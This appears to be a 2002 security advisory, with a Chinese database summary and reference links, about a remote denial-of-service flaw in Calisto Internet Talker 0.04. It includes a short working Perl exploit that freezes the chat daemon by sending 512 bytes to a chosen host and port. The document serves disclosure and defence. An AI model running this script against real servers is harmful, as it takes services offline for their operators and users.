https://cxsecurity.com/issue/WLB-2007100062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-578

Calisto是一款允许多人使用telnet连接服务器进行聊天的程序。Calisto对带有超长数据的请求处理不正确，远程攻击者可以利用这个漏洞进行拒绝服务攻击。发送512字节或者更多数据请求给Calisto守护程序，可使系统停止运行，产生拒绝服务。需要手工重新启动获得正常服务。

[=================================================================]
  [...............:[  S e c u r i t y F r e a k s  ]:...............]
  [.................:[  www.securityfreaks.com  ]:..................]
  [=================================================================]

Title         : Calisto Internet Talker Remote DOS
Risk          : Moderate
Software      : Calisto Internet Talker Version 0.04 and prior
Platforms     : Linux/Solaris/Cygwin
Vendor URL    : http://www.arcsite.de/hp/flibble/calisto/
Discovered by : subversive <subversive (at) linuxmail (dot) org [email concealed]>
Advisory ID   : SFAD02-002

.....:[ Overview :

Calisto is an Internet Talker that allows many people to use telnet
to connect to the server and chat. Calisto is coded in C and runs on
Linux/Solaris/Cygwin platforms. It is available on sourceforge as 
well as http://www.arcsite.de/hp/flibble/calisto/.

.....:[ Details :

By sending 512 bytes or more to the Calisto daemon it is possible to
freeze it, resulting in a denial of service. Calisto comes with an
autorun shell script that has been written for the sole purpose of 
automatically restarting Calisto should it crash but unfortunately
this vulnerability will not cause Calisto to crash and segfault but
rather freeze until manually restarted.

.....:[ Vendor Status :

Vendor contacted 1st/5th/10th November 2002 but did not respond.

.....:[ Solution :

Due to the nature of this bug it posses as more of an annoyance than a
major security threat. If your concerned with the problem then simply
disable Calisto until an updated version or patch has been released. 
Hopefully Calisto's vendors will take notice of this advisory and do 
something about the problem.

.....:[ Exploit - SF-talkischeap.pl :

#!/usr/bin/perl
#
# S e c u r i t y F r e a k s
#  www.securityfreaks.com
#
# Calisto Internet Talker Version 0.04 Remote Denial of Service
#
#
# This exploit will not cause Calisto to crash but rather cause it 
# to freeze until manually restarted. This actually works out better 
# because Calisto comes with an autorun script that would restart it 
# should it crash anyway.
#
# [ subversive[at]linuxmail.org ] - *31/10/2002*

use IO::Socket;

$data = "A";
$size = "512";
$freeze .= $data x $size;

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-h/ && do { $host = shift; };
    /^-p/ && do { $port = shift; };
}

if(!$host != 0) {

print <<"ACTIONSSPEAKLOUDERTHANWORDS";
   
   S e c u r i t y F r e a k s
     www.securityfreaks.com

SF-talkischeap.pl by subversive
   Calisto Internet Talker Version 0.04 Remote Denial of Service

Usage :  $0 -h <host> -p <port>

ACTIONSSPEAKLOUDERTHANWORDS
exit;

}

my $sock = new IO::Socket::INET ( Proto    => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "nCould not connect to $host : $!n" unless $sock;

print $sock "$freeze";
close($sock);
exit;

-- 
______________________________________________
http://www.linuxmail.org/
Now with POP3/IMAP access for only US$19.95/yr

Powered by Outblaze

来源:BID
名称:6238
链接:http://www.securityfocus.com/bid/6238
来源:XF
名称:calisto-dos(10694)
链接:http://xforce.iss.net/xforce/xfdb/10694
来源:SREASON
名称:3241
链接:http://securityreason.com/securityalert/3241
来源:BUGTRAQ
名称:20021125SFAD02-002:CalistoInternetTalkerRemoteDOS
链接:http://online.securityfocus.com/archive/1/300986
来源:VULNWATCH
名称:20021125SFAD02-002:CalistoInternetTalkerRemoteDOS
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0090.html
来源：NSFOCUS
名称：3905
链接：http://www.nsfocus.net/vulndb/3905